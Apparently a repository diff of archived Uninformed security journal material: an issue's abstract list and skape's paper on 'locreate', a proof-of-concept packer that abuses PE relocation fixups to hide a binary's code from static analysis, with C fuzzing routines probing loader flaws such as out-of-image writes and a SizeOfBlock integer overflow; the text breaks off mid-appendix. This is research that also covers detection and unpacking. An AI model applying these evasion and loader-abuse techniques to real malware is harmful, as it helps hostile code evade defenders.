Boiler Room, http://www.imdb.com/title/tt0181984/.

BIN
uninformed/5.5.pdf Normal file

Binary file not shown.

29
uninformed/5.txt Normal file
View File

@ -0,0 +1,29 @@
Exploitation Technology
Implementing a Custom X86 Encoder
skape
This paper describes the process of implementing a custom encoder for the x86 architecture. To help set the stage, the McAfee Subscription Manager ActiveX control vulnerability, which was discovered by eEye, will be used as an example of a vulnerability that requires the implementation of a custom encoder. In particular, this vulnerability does not permit the use of uppercase characters. To help make things more interesting, the encoder described in this paper will also avoid all characters above 0x7f. This will make the encoder both UTF-8 safe and tolower safe.
txt | html | pdf
Preventing the Exploitation of SEH Overwrites
skape
This paper proposes a technique that can be used to prevent the exploitation of SEH overwrites on 32-bit Windows applications without requiring any recompilation. While Microsoft has attempted to address this attack vector through changes to the exception dispatcher and through enhanced compiler support, such as with /SAFESEH and /GS, the majority of benefits they offer are limited to image files that have been compiled to make use of the compiler enhancements. This limitation means that without all image files being compiled with these enhancements, it may still be possible to leverage an SEH overwrite to gain code execution. In particular, many third-party applications are still vulnerable to SEH overwrites even on the latest versions of Windows because they have not been recompiled to incorporate these enhancements. To that point, the technique described in this paper does not rely on any compile time support and instead can be applied at runtime to existing applications without any noticeable performance degradation. This technique is also backward compatible with all versions of Windows NT+, thus making it a viable and proactive solution for legacy installations.
txt | html | pdf
Fuzzing
Effective Bug Discovery
vf
Sophisticated methods are currently being developed and implemented for mitigating the risk of exploitable bugs. The process of researching and discovering vulnerabilities in modern code will require changes to accommodate the shift in vulnerability mitigations. Code coverage analysis implemented in conjunction with fuzz testing reveals faults within a binary file that would have otherwise remained undiscovered by either method alone. This paper suggests a research method for more effective runtime binary analysis using the aforementioned strategy. This study presents empirical evidence that despite the fact that bug detection will become increasingly difficult in the future, analysis techniques have an opportunity to evolve intelligently.
code.tgz | txt | html | pdf
General Research
Wars Within
Orlando Padilla
In this paper I will uncover the information exchange of what may be classified as one of the highest money making schemes coordinated by 'organized crime'. I will elaborate on information gathered from a third party individual directly involved in all aspects of the scheme at play. I will provide a detailed explanation of this market's origin, followed by a brief description of some of the actions strategically performed by these individuals in order to ensure their success. Finally, I will elaborate on real world examples of how a single person can be labeled a spammer, malware author, cracker, and an entrepreneur gone thief. For the purposes of avoiding any legal matters, and unwanted media, I will refrain from mentioning the names of any individuals and corporations who are involved in the schemes described in this paper.
txt | html | pdf
Wireless Technology
Fingerprinting 802.11 Implementations via Statistical Analysis of the Duration Field
Johnny Cache
The research presented in this paper provides the reader with a set of algorithms and techniques that enable the user to remotely determine what chipset and device driver an 802.11 device is using. The technique outlined is entirely passive, and given the amount of features that are being considered for inclusion into the 802.11 standard, seems quite likely that it will increase in precision as the standard marches forward. The implications of this are far ranging. On one hand, the techniques can be used to implement innovative new features in Wireless Intrusion Detection Systems (WIDS). On the other, they can be used to target link layer device driver attacks with much higher precision.
code.ref | html | pdf

2606
uninformed/6.1.txt Normal file

File diff suppressed because it is too large Load Diff

895
uninformed/6.2.txt Normal file
View File

@ -0,0 +1,895 @@
Locreate: An Anagram for Relocate
skape
12/2006
mmiller@hick.org
1) Foreword
Abstract: This paper presents a proof of concept executable packer
that does not use any custom code to unpack binaries at execution time. This
is different from typical packers which generally rely on packed executables
containing code that is used to perform the inverse of the packing operation
at runtime. Instead of depending on custom code, the technique described in
this paper uses documented behavior of the dynamic loader as a mechanism for
performing the unpacking operation. This difference can make binaries packed
using this technique more difficult to signature and analyze, but only when
presented to an untrained eye. The description of this technique is meant to
be an example of a fun thought exercise and not as some sort of revolutionary
packer. In fact, it's been used in the virus world many years prior to this
paper.
Thanks: The author would like to thank Skywing, spoonm, deft,
intropy, Orlando Padilla, nemo, Richard Johnson, Rolf Rolles, Derek Soeder,
and Andre Protas for their discussions and feedback.
Challenge: Prior to reading this paper, the author recommends that
the reader attempt to determine the behavior of the packer that was used on
the binary included in the attached code sample. The binary itself is
innocuous and just performs a few simple printf operations.
Previous Research: This technique has been used in the virus world far in
advance of this writing. Examples that apply this technique include
W95/Resurrel and W95/Silcer. Further research indicates that Peter Szor did a
write-up on this technique entitled ``Tricky Relocations'' in the April 2001
edition of Virus Bulletin[2,3].
2) Locreate
Executable packers, such as UPX, are commonly employed by malware as a means
of delaying or otherwise thwarting the process of static analysis. Packers
also have perfectly legitimate uses, but these uses fall outside of the scope
of this paper. The reason packers make static analysis more difficult is
because they alter the form of the binary to the point that what appears on
disk is entirely different from what actually ends up executing in memory.
This alteration is typically accomplished by encapsulating a pre-existing
binary in a ``host'' binary. The algorithm used to encapsulate the
pre-existing binary in the host binary is what differs from one packer to the
next. In most cases, the host binary must contain code that will perform the
inverse of the packing operation in order to decapsulate the original binary.
The code that is responsible for performing this operation is typically
referred to as an unpacker. The process of unpacking the original binary is
usually done entirely in memory without writing the original version out to
disk. Once the original binary is unpacked, execution control is transferred
to the original binary which begins executing as if nothing had changed.
This general approach represents an easy way of altering the form of a binary
without changing its effective behavior. In fact, it's pretty much analagous
to payload encoders that are used in conjunction with exploits to alter the
form of a payload in order to satisify some character restrictions without
changing the payload's effective behavior. In the case of payload encoders,
some arbitrary code must be prefixed to the encoded payload in order to
perform the inverse of the encoding operation once the payload is executed.
However, like payload encoders, the use of custom code to perform the inverse
of the packing or encoding operation can lead to a few problems.
The most apparent of these problems has to do with the fact that while the
packed form of an executable may be entirely different from its original, the
code used to perform the unpacking operation may be static. In the event that
the unpacker consists of static code, either in whole or in part, it may be
possible to signature or otherwise identify that a particular packing
algorithm has been used to produce a binary and thus make it easier to restore
the original form of the binary. This ability is especially important when it
comes to attempting to heuristically identify malware prior to allowing a user
to execute it.
The use of custom code can also make it possible for tools to be developed
that attempt to identify unpackers based on their behavior. Ero Carrera has
provided some excellent illustrations relating to the feasibility of this type
of attack against unpackers[1]. An understanding of an unpacker's behavior may
also make it possible to acquire the original binary without allowing it to
actually execute by simply tracing the unpacker up until the point where it
transfers execution control to the original binary. In the case of malware,
this weakness means that benefits gained from packing an executable can be
completely nullified.
Both of these problems are meant to illustrate that even though custom unpacking
code is often a requirement, its mere presence exposes a potential point of
weakness. If it were possible to eliminate the custom code required to unpack
a binary, it could make the two problems described previously much more difficult
to realize. To that point, the technique described in this paper does not
rely on the presence of custom code in a packed binary in order to unpack
itself. Instead, documented behavior of the dynamic loader is used to perform
the unpacking whenever the packed binary is executed. While this approach has
its benefits, there are a number of problems with it that will be discussed
later on. In the interest of brevity, the packer described in this paper will
simply be referred to as locreate. As was already mentioned,
locreate leverages a documented feature of most dynamic loaders in order to
perform its unpacking operation. Given that the process of unpacking
typically involves transforming the original binary's contents back into its
original form, there are only a finite number of dynamic loader features that
might be abused. Perhaps the feature that is best suited for transforming the
contents of a binary at runtime is the dynamic loader feature that was
designed to do just that: relocations.
In the event that a binary is unable to be loaded at its preferred base
address at runtime, the dynamic loader is responsible for attempting to move
the binary to another location in memory. The act of moving a binary from its
preferred base address to a new base address is more commonly referred to as
relocating. When a binary is relocated to a new base address, any references
the binary might have to addresses that are relative to its preferred base
address will no longer be valid. As such, references that are relative to the
preferred base address must be updated by the dynamic loader in order to make
them relative to the new base address. Of course, this presupposes that the
dynamic loader has some knowledge of where in the binary these address
references are made. To satisfy this presupposition, binaries will typically
include relocation information to provide the dynamic loader with a map to the
locations within the binary that need to be adjusted. When a binary does not
include relocation information, it's classified as a non-relocatable binary.
Without relocation information, a binary cannot be relocated to an alternate
base address in an elegant manner (ignoring position independent executables).
The structures used to convey relocation information differs from one binary
format to the next. For the purpose of this paper, only the structures used
to describe relocations of Portable Executable (PE) binaries will be
discussed. However, it should be noted that the approaches described in this
paper should be equally applicable to other binary formats, such as ELF. In
fact, other binary formats make the technique used by locreate even easier.
For example, ELF supports applying relocation fixups with an addend. This
addend is basically an arbitrary value that is used in conjunction with a
transformation. The PE binary format conveys relocation information through
one of the data directories that is included within the optional header
portion of the NT header. This data directory is symbolically referred to
through the use of the IMAGE_DIRECTORY_ENTRY_BASERELOC. The base relocation
data directory consists of zero or more IMAGE_BASE_RELOCATION structures which
are defined as:
typedef struct _IMAGE_BASE_RELOCATION {
ULONG VirtualAddress;
ULONG SizeOfBlock;
// USHORT TypeOffset[1];
} IMAGE_BASE_RELOCATION, *PIMAGE_BASE_RELOCATION;
The base relocation data directory is a little bit different from most other
data directories. The IMAGE_BASE_RELOCATION structures embedded in the data
directory do not occur immediately one after the other. Instead, there are a
variable number of USHORT sized fixup descriptors that separate each
structure. The SizeOfBlock attribute of each structure describes the entire
size of a relocation block. Each relocation block consists of the base
relocation structure and the variable number of fixup descriptors. Therefore,
enumeration of the base relocation data directory is best performed by using
the SizeOfBlock attribute of each structure to proceed to the next relocation
block until none are remaining. The VirtualAddress attribute of each
relocation block is a page-aligned relative virtual address (RVA) that is used
as the base address when processing its associated fixup descriptors. In this
manner, each relocation block describes the relocations that should be applied
to exactly one page.
The fixup descriptors contained within a relocation block describe the address
of the value that should be transformed and the method that should be used to
transform it. The PE format describes about 10 different transformations that
can be used to fixup an address reference. These transformations are conveyed
through the top 4 bits of each fixup descriptor. The bottom 12 bits are used
to describe the offset into the VirtualAddress of the containing relocation
block. Adding the bottom 12 bits of a fixup descriptor to the VirtualAddress
of a relocation block produces the RVA that contains a value that needs to be
transformed. Of the transformation methods that exist, the one most commonly
used on x86 is IMAGE_REL_BASED_HIGHLOW, or 3. This transformation dictates that
the 32-bit displacement between the original base address and the new base
address should be added to the value that exists at the RVA described by the
fixup descriptor. The act of adding the displacement means that the value
will be transformed to make it relative to the new base address rather than
the original base address. To better understand how all of these things tie
together, consider the following source code example:
#include <stdlib.h>
#include <stdio.h>
int main(int argc, char **argv)
{
printf("Hello World.\n");
return 0;
}
When compiled down, this function appears as the following:
sample!main:
00401010 55 push ebp
00401011 8bec mov ebp,esp
00401013 6800104200 push offset sample!__rtc_tzz <PERF> (sample+0x21000) (00421000)
00401018 e80c000000 call sample!printf (00401029)
0040101d 83c404 add esp,4
00401020 33c0 xor eax,eax
00401022 5d pop ebp
00401023 c3 ret
At address 0x00401013, main pushes the address of the string that contains
``Hello World!'':
0:000> db 00421000 L 10
00421000 48 65 6c 6c 6f 20 57 6f-72 6c 64 2e 0a 00 00 00 Hello World.....
In this case, the push instruction is referring to the string using an
absolute address. If the sample executable must be relocated at runtime, the
dynamic loader must be provided with the relocation information necessary to
fixup the reference to the absolute address. The dumpbin.exe utility from
Visual Studio can be used to confirm that this information exists. The first
requirement is that the binary must have relocation information. By default,
all DLLs will contain relocation information, but executables typically do
not. Executables can be compiled with relocation information by using the
/fixed:no linker flag. When a binary is compiled with relocations, the
presence of relocation information is simply indicated by a non-zero
VirtualAddress and Size for the base relocation data directory. These values
can be determined through dumpbin.exe /headers:
26000 [ EE8] RVA [size] of Base Relocation Directory
Since relocation information must be present at runtime, there should also be
a section, typically named .reloc, that contains the virtual mapping
information for the relocation information:
SECTION HEADER #5
.reloc name
1165 virtual size
26000 virtual address (00426000 to 00427164)
2000 size of raw data
24000 file pointer to raw data (00024000 to 00025FFF)
0 file pointer to relocation table
0 file pointer to line numbers
0 number of relocations
0 number of line numbers
42000040 flags
Initialized Data
Discardable
Read Only
In order to validate that this executable contains relocation information for
the absolute address reference made to the ``Hello World!'' string, the
dumpbin.exe /relocations command can be used:
File Type: EXECUTABLE IMAGE
BASE RELOCATIONS #5
1000 RVA, A8 SizeOfBlock
14 HIGHLOW 00421000
2C HIGHLOW 00420350
...
This output shows the first relocation block which describes the RVA 0x1000.
Each line below the relocation block header describes the individual fixup
descriptors. The information displayed includes the offset into the page, the
type of transformation being performed, and the current value at that location
in the binary. From the disassembly above, the location of the address
reference that is being made is 0x00401014. Therefore, the very first fixup
in this relocation block provides the dynamic loader within the information
necessary to change the address reference to the new base address when the
binary is relocated. If this binary were to be relocated to 0x50000000, the
HIGHLOW transformation would be applied to 0x00401014 as follows. The
displacement between the new base address and the old address would be
calculated as 0x50000000 - 0x00400000, or 0x4fc00000. Adding 0x4fc00000 to
the existing value of 0x00421000 produces 0x50021000 which is subsequently
stored in 0x00401014. This causes the absolute address reference to become
relative to the new base address.
Based on this basic understanding of how relocations are processed, it's now
possible to describe how a packer can be implemented that takes advantage of
the way the dynamic loader processes relocation information. As has been
illustrated above, relocation information is designed to make it possible to
fixup absolute address references at runtime when a binary is relocated.
These fixups are applied by taking into account the displacement between the
new base address and the original base address. More often than not, this
displacement isn't known ahead of time, thus making it impossible to reliably
predict how the content at a specific location in the binary will be altered.
But what if it were possible to deterministically know the displacement in
advance? Knowing the displacement in advance would make it possible to alter
various locations of the binary in a manner that would permit the original
values to be restored by relocations at runtime. In effect, the on-disk
version of the binary could be made to appear quite different from the
in-memory version at runtime. This is the basic concept behind locreate.
In order for locreate to work it must be possible to predict the displacement
reliably. Since the displacement is calculated in relation to the preferred
base address and the expected base address, both values must be known.
Furthermore, the binary must be relocated every time it executes in order for
the relocations to be applied. As it happens, both of these problems can be
solved at once. Since a binary is only guaranteed to be relocated if its
preferred base address is in conflict with an existing address, a preferred
base address must be selected that will always lead to a conflict. This can
be accomplished by setting the preferred base address to any invalid user-mode
address (any address above 0x80000000 inclusive). This assumes that the machine
that the executable will run on is not running with /3GB. If so, a higher
address would have to be used.. Alternatively, the base address can be set to
SharedUserData which is guaranteed to be located at 0x7ffe0000 in every
process. Setting the binary's preferred base address to any of these
addresses will force it to be relocated every time it executes. The only
unknown is what address the binary is expected to be relocated to.
Determining the address that will be relocated to depends on the state of the
process' address space at the time that the binary is relocated. If the
binary that's being relocated is an executable, then the process' address
space is generally in a pristine state since the executable is one of the
first things to be mapped into the address space. As such, the first
available address will always be 0x10000 on default installations of Windows.
If the binary is a DLL, it's hard to predict what the state of the address
space will be in all cases. When a conflict does occur, the kernel searches
for an available address region by traversing from lowest to highest address.
For the purposes of this paper, it will be assumed that an executable is being
packed and that the address being relocated to is 0x10000. Further research
may provide insight into how to better control or alter the expected base
address.
With both the preferred base address and the expected base address known, the
only thing that remains is to perform the operations that will transform the
on-disk version of the binary in a manner that causes custom relocations to
restore the binary to its original form at runtime. This process can be both
simplistic and complicated. The simplest approach would be to enumerate over
the contents of each section in the binary, altering the value at each
location by subtracting the displacement and then creating a relocation fixup
descriptor that will ensure that the contents are restored to the expected
value at runtime. This is how the proof of concept works. A more complicated
approach would be to create multiple relocation fixup descriptors per-address.
This would mean that the displacement would need to be subtracted once for
each fixup descriptor. It should also be possible to apply relocations to
individual bytes within a four byte span rather than applying relocations in
four byte increments. Even more interesting would be to use some fixup types
other than HIGHLOW, although this could be seen as something that might make
generating a signature easier.
The end result of this whole process is a functional proof of concept that
packs a binary in the manner described above. To get a feel for how different
the binary looks after being packed, consider what the implementation of main
from earlier in this paper looks like. Notice how the first two instructions
are the same as they were previously. This has to do with the fact that base
addresses must align on 64KB boundaries, and thus the lower two bottoms are
not changed. This could be further improved such as through the strategies
described above:
.text:84011000 loc_84011000:
.text:84011000 push ebp
.text:84011001 mov ebp, esp
.text:84011003 in al, dx
.text:84011004 add [eax+0], dh
.text:84011006 add [edi+edi*8+1209C15h], eax
.text:8401100D test [ebx-3FCCFB3Ch], al
.text:84011013 loope near ptr 84010FD8h
.text:84011015
.text:84011015 loc_84011015:
.text:84011015 push (offset off_8401139C+1)
The locreate proof of concept has been tested on Windows XP and Windows 2003
Server. Initial testing on Windows Vista indicates that Vista does not
properly alter the entry point address after relocations have been applied
when an executable is packed. Even though the proof of concept implementation
works, there are a number of more fundamental problems with the technique
itself.
The first set of problems has to do with techniques that can be used to
signature locreate packed executables. Since locreate relies on injecting a
large number of relocation fixups, it may be possible to heuristically detect
an increased number of relocation fixups with relation to the size of
individual segments. This particular attack could be solved by decreasing the
number of relocation fixups injected by locreate. This would have the effect
of only partially mangling the binary, but it might be enough to make people
wonder what's going on without giving things away. Even if it weren't
possible to heuristically detect an increased number of relocation fixups,
it's definitely possible to detect the fact that an executable packed by
locreate will have an invalid preferred base address that will always result
in a conflict. This fact alone makes it mostly trivial to at least detect
that something odd is going on.
Detection is only the first problem, however. Once a locreate packed
executable has been detected, the next logical step is to attempt to figure
out some way of obtaining the original executable. Since locreate relies on
relocation fixups to do this, the only thing one would have to do in order to
obtain the original binary would be to relocate the executable to the expected
base address that was used when the binary was packed, such as 0x10000. While
it's trivial to develop tools to perform this action, the Interactive
Disassembler (IDA) already supports it. When opening an executable, the
``Manual Load'' checkbox can be toggled. This will cause IDA to prompt the
user to enter the base address that the binary should be loaded at. When the
base address is entered, IDA processes relocations and presents the relocated
binary image. The mitigating factor here is that the user must know the
expected base address, otherwise the binary will still appear completely
mangled when it's relocated to the wrong base address.
In the author's opinion, these problems make locreate a sub-par packer. At
best it should be viewed as an interesting approach to the problem of packing
executables, but it should not be relied upon as a means of thwarting static
analysis. Anyone who reads this paper will have the tools necessary to unpack
executables that have been packed by locreate. With that said, it should be
noted that there is still an opportunity for further research that could help
to identify ways of improving locreate. For instance, a better understanding
of differences in the way the dynamic loader and existing static analysis
tools process relocation fixups could provide some opportunity for
improvement. Results from some of the author's initial tests of these ideas
are included in appendix A. Here's a brief list of some differences that could
exist:
1. Different behaviors when processing fixups
It's possible that the dynamic loader and static analysis tools such as IDA
may not support the same set of fixup types. Furthermore, they may not
process fixup types in the same way. If differences do exist, it may be
possible to create a packed executable that will work correctly when used
against the dynamic loader but not render properly when relocated using a
static analysis tool such as IDA.
2. Relocation blocks with non-page-aligned VirtualAddress fields
It's unknown whether or not the dynamic loader and static analysis tools are
able to properly handle relocation blocks that have non-page-aligned
VirtualAddress's. In all normal circumstances, VirtualAddress will be
page aligned.
3. Relocation blocks that modify other relocation blocks
An interesting situation that may lead to differences between the dynamic
loader and static analysis tools has to do with relocation blocks that modify
other relocation blocks. In this way, the relocation information that exists
on disk is not what is actually used, in its entirety, when relocating an
image during runtime.
Even if research into these topics doesn't yield any direct improvements to
locreate, it should nonetheless provide some interesting insight into the way
that different applications handle relocation processing. And after all,
gaining knowledge is what it's really all about.
Appendix A) Differences in Relocation Processing
This appendix attempts to describe some tests that were run on different
applications that process relocation entries for binary files. Identifying
differences may make it possible to have a binary that will work correctly
when executed but not when analyzed by a static analysis tool such as IDA. To
test out these ideas, the author threw together a small relocation fuzzing
tool that is aptly named relocfuzz. This tool will take a pre-existing binary
and create a new one with custom relocations. The code for this tool can be
found in the other code associated with this paper.
The tests included in this appendix were performed against three different
applications: the dynamic loader (ntdll.dll), IDA, and dumpbin. If the same
tests are run against other applications, the author would be interested in
knowing the results.
A.1) Non-page-aligned Block VirtualAddress
In all normal cases, relocation blocks will be created with a page-aligned
VirtualAddress. However, it's unclear if non-page-aligned VirtualAddress
fields will be handled correctly when relocations are processed. There are
some interesting implications of non-page-aligned VirtualAddress's. In many
applications, such as the dynamic loader, it's critical that addresses
referenced through RVAs are validated so as to prevent references being made
to external addresses. For example, if relocations were processed in
kernel-mode, it would be critical that checks be performed to ensure that RVAs
don't end up making it possible to reference kernel-mode addresses. The
reason why non-page-aligned VirtualAddress's are interesting is because they
leave open the possibility of this type of attack.
Consider the scenario of a binary that is relocated to 0x7ffe0000, ignoring
for the moment that SharedUserData already exists at this location. Now,
consider that this binary has a relocation block with a virtual address of
0x1ffff. This address is not page-aligned. Now, consider that this
relocation block has a fixup descriptor that indicates that at offset 0x4 into
this page, a certain type of fixup should be performed. This would equate to
modifying memory at 0x80000003, a kernel-mode address. If relocations were
being processed in kernel-mode, like they are on Windows Vista for ASLR, then
a failure to check that the actual address being written to would result in a
dangerous condition.
Here's an example of some code that attempts to test out this idea:
static VOID TestNonPageAlignedBlocks(
__in PPE_IMAGE Image,
__in PRELOC_FUZZ_CONTEXT FuzzContext)
{
PRELOCATION_BLOCK_CONTEXT KillerBlock = AllocateRelocationBlockContext(1);
PrependRelocationBlockContext(
FuzzContext,
KillerBlock);
KillerBlock->Rva = 0x10001;
KillerBlock->Fixups[0] = (3 << 12) | 0;
}
In this example, a custom relocation block is created with one fixup
descriptor. The VirtualAddress associated with the block is set to 0x10001
and the first fixup descriptor is set to modify offset 0 into that RVA. If
the binary that is hosting these relocations is relocated to 0x10000, a write
should occur to 0x20001 when processing the relocations. Here are the results
from a few initial tests:
ntdll.dll: The relocation fixup is processed and results in a write
to 0x20001.
IDA: Ignores the relocation fixup, but only because it writes outside of the
executable from what it would appear.
dumpbin.exe: Parses the relocation block without issue.
A.2) Writing to External Addresses
Due to the fact that the VirtualAddress associated with each relocation block
is a 32-bit RVA, it is possible to create relocation blocks that have RVAs
that actually reside outside of the mapped executable that is being relocated.
This is important because if steps aren't taken to detect this scenario, the
application processing the relocation fixups might be tricked into writing to
memory that is external to the mapped binary. Creating a test-case for this
example is trivial:
static VOID CreateExternalWriteRelocationBlock(
__in PPE_IMAGE Image,
__in PRELOC_FUZZ_CONTEXT FuzzContext)
{
PRELOCATION_BLOCK_CONTEXT ExtBlock = AllocateRelocationBlockContext(2);
ExtBlock->Rva = 0x10000;
ExtBlock->Fixups[0] = (3 << 12) | 0x0;
ExtBlock->Fixups[1] = (3 << 12) | 0x1;
PrependRelocationBlockContext(
FuzzContext,
ExtBlock);
}
In this test, a relocation block is created that has a VirtualAddress of
0x10000. When the binary is relocated to 0x10000, the actual address of the
region that will be written to is 0x20000. In almost all versions of Windows
NT, this address is the location of the process parameters structure. The
block itself contains two fixup descriptors, each of which will result in a
write to the first few bytes of the process parameters structure. The results
after running this test are:
ntdll.dll: The relocation fixup is processed and results in two 32-bit writes
to 0x20000 and 0x20001.
IDA: Ignores RVAs outside of the executable.
dumpbin.exe: N/A, dumpbin doesn't actually perform relocation fixups.
A.3) Self-updating Relocation Blocks
One of the more interesting nuisances about the way relocation fixups are
processed is that it's actually possible to create a relocation block that
will perform fixups against other relocation blocks. This has the effect of
making it such that the relocation information that appears on disk is
actually different than what is processed when relocation fixups are applied.
The basic idea behind this approach is to prepend certain relocation blocks
that apply fixups to subsequent relocation blocks. This all works because
relocation blocks are typically processed in the order that they appear. An
example of this basic concept is described shown below:
static VOID PrependSelfUpdatingRelocations(
__in PPE_IMAGE Image,
__in PRELOC_FUZZ_CONTEXT FuzzContext)
{
PRELOCATION_BLOCK_CONTEXT SelfBlock;
PRELOCATION_BLOCK_CONTEXT RealBlock;
ULONG RelocBaseRva;
ULONG NumberOfBlocks = FuzzContext->NumberOfBlocks;
ULONG Count;
//
// Grab the base address that relocations will be loaded at
//
RelocBaseRva = FuzzContext->BaseRelocationSection->VirtualAddress;
//
// Grab the first block before we start prepending
//
RealBlock = FuzzContext->NewRelocationBlocks;
//
// Prepend self-updating relocation blocks for each block that exists
//
for (Count = 0; Count < NumberOfBlocks; Count++)
{
PRELOCATION_BLOCK_CONTEXT RelocationBlock;
RelocationBlock = AllocateRelocationBlockContext(2);
PrependRelocationBlockContext(
FuzzContext,
RelocationBlock);
}
//
// Walk through each self updating block, fixing up the real blocks to
// account for the amount of displacement that will be added to their Rva
// attributes.
//
for (SelfBlock = FuzzContext->NewRelocationBlocks, Count = 0;
Count < NumberOfBlocks;
Count++, SelfBlock = SelfBlock->Next, RealBlock = RealBlock->Next)
{
SelfBlock->Rva = RelocBaseRva + RealBlock->RelocOffset;
//
// We'll relocate the two least significant bytes of the real block's RVA
// and SizeOfBlock.
//
SelfBlock->Fixups[0] = (USHORT)((IMAGE_REL_BASED_HIGHLOW << 12) |
(((RealBlock->RelocOffset - 2) & 0xfff)));
SelfBlock->Fixups[1] = (USHORT)((IMAGE_REL_BASED_HIGHLOW << 12) |
(((RealBlock->RelocOffset + 2) & 0xfff)));
SelfBlock->Rva &= ~(PAGE_SIZE-1);
//
// Account for the amount that will be added by the dynamic loader after
// the first self-updating relocation blocks are processed.
//
*(PUSHORT)(&RealBlock->Rva) -= (USHORT)(FuzzContext->Displacement >> 16) + 2;
*(PUSHORT)(&RealBlock->SizeOfBlock) -= (USHORT)(FuzzContext->Displacement >> 16) + 2;
}
}
This test works by prepending a self-updating relocation block for each
relocation block that exists in the binary. In this way, if there were two
relocations blocks that already existed, two self-updating relocation blocks
would be prepended, one for each of the two existing relocation blocks.
Following that, the self-updating relocation blocks are populated. Each
self-updating relocation block is created with two fixup descriptors. These
fixup descriptors are used to apply fixups to the VirtualAddress and
SizeOfBlock attributes of its corresponding existing relocation block. Since
a HIGHLOW fixup only applies to two most significant bytes, the RVAs of the
corresponding fields are adjusted down by two. The end result of this
operation is that the first n relocation blocks are responsible for fixing up
the VirtualAddress and SizeOfBlock attributes associated with subsequent
relocation blocks. When relocations are processed in a linear fashion, the
subsequent relocation blocks are updated in a way that allows them to be
processed correctly.
Running this test against the set of test applications produces the following
results:
ntdll.dll: The relocation blocks are fixed up accordingly and the application
executes as expected.
IDA: Initial testing indicates that IDA is capable of handling self-updating
relocation blocks.
dumpbin.exe: Crashes as the result of apparently corrupt relocation blocks:
DUMPBIN : fatal error LNK1000:
Internal error during
DumpBaseRelocations
Version 8.00.50727.42
ExceptionCode = C0000005
ExceptionFlags = 00000000
ExceptionAddress = 00443334
NumberParameters = 00000002
ExceptionInformation[ 0] = 00000000
ExceptionInformation[ 1] = 7FFA2000
CONTEXT:
Eax = 0000000A Esp = 0012E500
Ebx = 00004F00 Ebp = 00000000
Ecx = 7FFA2000 Esi = 00000000
Edx = 781C3B68 Edi = 7FFA2000
Eip = 00443334 EFlags = 00010293
SegCs = 0000001B SegDs = 00000023
SegSs = 00000023 SegEs = 00000023
SegFs = 0000003B SegGs = 00000000
Dr0 = 00000000 Dr3 = 00000000
Dr1 = 00000000 Dr6 = 00000000
Dr2 = 00000000 Dr7 = 00000000
A.4) Integer Overflows in Size Calculations
A potential source of mistakes that could be made when processing relocations
has to do with the handling of the SizeOfBlock attribute of a relocation
block. There is a potential for an integer overflow to occur in applications
that don't properly handle situations where the SizeOfBlock attribute is less
than the size of the base relocation structure (which is 8 bytes). In order
to calculate the total number of fixups in a section, it's common to see a
calculation like (Block->SizeOfBlock - 8) / 2. However, if a check isn't made
to ensure that SizeOfBlock is at least 8, an integer overflow will occur. If
this happens, the application processing relocations would be tricked into
processing a very large number of relocations. An example of a test for this
issue is shown below:
static VOID TestIntegerOverflow(
__in PPE_IMAGE Image,
__in PRELOC_FUZZ_CONTEXT FuzzContext)
{
PRELOCATION_BLOCK_CONTEXT EvilBlock = AllocateRelocationBlockContext(0);
EvilBlock->SizeOfBlock = 0;
EvilBlock->Rva = 0x1000;
PrependRelocationBlockContext(
FuzzContext,
EvilBlock);
}
In this example, a relocation block is created that has its SizeOfBlock
attribute set to zero. This is invalid because the minimum size of a block is
8 bytes. The results of this test against different applications are shown
below:
ntdll.dll: Does not perform appropriate checks which appears to result in an
integer overflow:
(9d4.6dc): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00014008 ecx=00011000 edx=80010000 esi=00015000 edi=ffffffff
eip=7c91e163 esp=0013fa98 ebp=0013faac iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
ntdll!LdrProcessRelocationBlockLongLong+0x1a:
7c91e163 0fb706 movzx eax,word ptr [esi] ds:0023:00015000=????
IDA: Ignores the relocation block, but may not process relocations correctly
as a result (unclear at this point).
dumpbin.exe: Refuses to show relocations:
Microsoft (R) COFF/PE Dumper Version 8.00.50727.42
Copyright (C) Microsoft Corporation. All rights reserved.
Dump of file foo.exe
File Type: EXECUTABLE IMAGE
BASE RELOCATIONS #4
Summary
1000 .data
1000 .rdata
1000 .reloc
1000 .text
A.5) Consistent Handling of Fixup Types
Applications that process relocation fixups may also differ in their level of
support for different types of fixups. While most binaries today use the
HIGHLOW fixup exclusively, there are still quite a few other types of fixups
that can be applied. If differences in the way relocation fixups are
processed can be identified, it may be possible to create a binary that
relocates correctly in one application but not in another application. The
following code demonstrates an example of this type of test:
static VOID TestConsistentRelocations(
__in PPE_IMAGE Image,
__in PRELOC_FUZZ_CONTEXT FuzzContext)
{
PRELOCATION_BLOCK_CONTEXT Block = AllocateRelocationBlockContext(16);
ULONG Rva = FuzzContext->BaseRelocationSection->VirtualAddress;
INT Index;
PrependRelocationBlockContext(
FuzzContext,
Block);
Block->Rva = 0x1000;
for (Index = 0; Index < 16; Index++)
{
//
// Skip invalid fixup types
//
if ((Index >= 6 && Index <= 8) ||
(Index >= 0xb && Index <= 0x10))
continue;
Block->Fixups[Index] = (Index << 12) | Index;
}
}
This test works by prepending a relocation block that contains a relocation
fixup for each different valid fixup type. This results in a relocation block
that looks something like this:
BASE RELOCATIONS #4
1000 RVA, 28 SizeOfBlock
0 ABS
1 HIGH EC8B
2 LOW 8BEC
3 HIGHLOW 5008458B
4 HIGHADJ 0845 (5005)
0 ABS
0 ABS
0 ABS
9 IMM64
A DIR64 8000209C15FF8000
0 ABS
0 ABS
0 ABS
0 ABS
0 ABS
The results for this test are shown below:
ntdll.dll: While not confirmed, it is assumed that the dynamic loader performs
all fixup types correctly. This results in the following code being produced
in the test binary:
foo+0x1000:
00011000 55 push ebp
00011001 8c6c8b46 mov word ptr [ebx+ecx*4+46h],gs
00011005 895068 mov dword ptr [eax+68h],edx
00011008 1830 sbb byte ptr [eax],dh
0001100a 0100 add dword ptr [eax],eax
0001100c 00b69b200100 add byte ptr foo+0x209b (0001209b)[esi],dh
00011012 83c408 add esp,8
IDA: Appears to handle some relocation fixup types differently than the
dynamic loader. The result of IDA relocating the same binary results in the
following being produced:
.text:00011000 push ebp
.text:00011001 mov ebp, esp
.text:00011003 mov eax, [ebp+9]
.text:00011006 shr byte ptr [eax+18h], 1 ; "Called TestFunction()\n"
.text:00011009 xor [ecx], al
.text:00011009
.text:0001100B db 0
.text:0001100C
.text:0001100C add byte ptr ds:printf[esi], dl
.text:00011012 add esp, 8
Equates to:
